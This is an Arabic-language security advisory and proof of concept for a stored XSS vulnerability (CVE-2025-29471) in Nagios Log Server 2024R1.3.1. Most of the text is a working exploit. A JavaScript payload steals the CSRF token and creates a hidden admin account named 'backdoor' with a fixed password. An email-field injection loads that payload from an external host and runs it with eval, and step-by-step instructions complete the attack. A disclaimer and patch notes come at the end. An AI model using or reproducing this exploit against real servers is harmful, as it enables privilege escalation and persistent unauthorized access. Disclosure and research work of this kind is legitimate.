
ثغرة XSS مخزنة في Nagios Log Server 2024R1.3.1
2024R1.3.1 وما دونهNagios Log Server 2024R1.3.1 (الإعدادات الافتراضية، Ubuntu 20.04)CWE-79CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:Hلأغراض الاختبار والبحث المصرح به فقط. لا تختبر أو تستغل هذه الثغرة على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
تسمح ثغرة XSS مخزنة في Nagios Log Server 2024R1.3.1 لمستخدم ذي صلاحيات منخفضة بحقن JavaScript ضار في حقل 'email' الخاص بملف تعريفه.
عندما يعرض المسؤول سجلات التدقيق، يتم تنفيذ الحمولة، مما يؤدي إلى تصعيد الامتيازات عبر إنشاء حساب مسؤول غير مصرح به.
xss.js على خادمك الخارجي بالمحتوى التالي. يعمل GitHub بشكل جيد.قم بتحديث <target-ip> إلى عنوان IP/اسم المضيف لخادم Nagios Log Server المستهدف.
(function() {
console.log("🔥[XSS] Payload Executing...🔥");
var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
if (!csrfTokenMatch) return;
var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
console.log("[XSS] CSRF Token:", csrfToken);
var requestBody = "csrf_ls=" + csrfToken +
"&name=backdoor" +
"&[email protected]" +
"&username=backdoor" +
"&password=Password123!" +
"&password2=Password123!" +
"&auth_type=admin" +
"&apiaccess=1" +
"&language=en_US" +
"&account_type=local";
fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: requestBody
})
.then(response => response.text())
.then(function(data) {
console.log("🔥[XSS] User Created Successfully!🔥");
console.log(data);
})
.catch(console.error);
})();
سجل الدخول إلى Nagios Log Server كمستخدم قياسي (غير مسؤول).
انتقل إلى نقطة تحديث الملف الشخصي:
http://<target-ip>/nagioslogserver/profile/update
احقن الحمولة التالية في حقل البريد الإلكتروني. قم بتحديث سطر fetch بعنوان URL حيث يتم تخزين xss.js.
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
.then(response => response.text())
.then(scriptText => eval(scriptText))
.catch(console.error);
</script>
اسم المستخدم: backdoor
كلمة المرور: Password123!
backdoor مع وصول كامل كمسؤول في Nagios Log Server.Nagios Log Server 2024R2Nagios Log Server 2024R2 وتحقق من حل ثغرة XSS المخزنة، وأبلغ Nagios بالتحديثCVE-2025-29471 لهذه الثغرة، لكن التفاصيل ظلت غير منشورة بسبب عدم وجود إعلان أمان عام من البائع2024R1.3.2) لتطبيق إصلاح ثغرة XSS المخزنة على فرع 2024R1CVE-2025-29471 رسميًاتم إجراء هذا العمل خارج نطاق عملي ويعكس جهودي الشخصية في مجال البحث الأمني السيبراني.